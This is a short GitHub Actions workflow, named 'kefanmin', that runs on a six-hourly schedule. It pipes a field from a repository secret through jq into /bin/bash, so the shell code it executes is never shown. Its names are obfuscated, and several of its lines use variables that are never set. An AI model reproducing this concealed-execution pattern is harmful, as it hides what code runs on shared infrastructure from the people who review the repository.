name: kefanmin

on:
  workflow_dispatch:
  schedule:
    - cron: '44 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: kefanmin
        env:
          bzr471: ${{ secrets.bzr471 }}
        run: |
          echo $bzr471 | jq -r .unbl70146 | /bin/bash
          echo $mp3 | jq -r .n1 | /bin/bash
          echo $ttcf395 | jq -r .k546 | /bin/bash
          echo $snvd4 | jq -r .jxiv1 | /bin/bash
          echo $inx5831 | jq -r .phq90 | /bin/bash
          echo $ra64 | jq -r .guy3 | /bin/bash

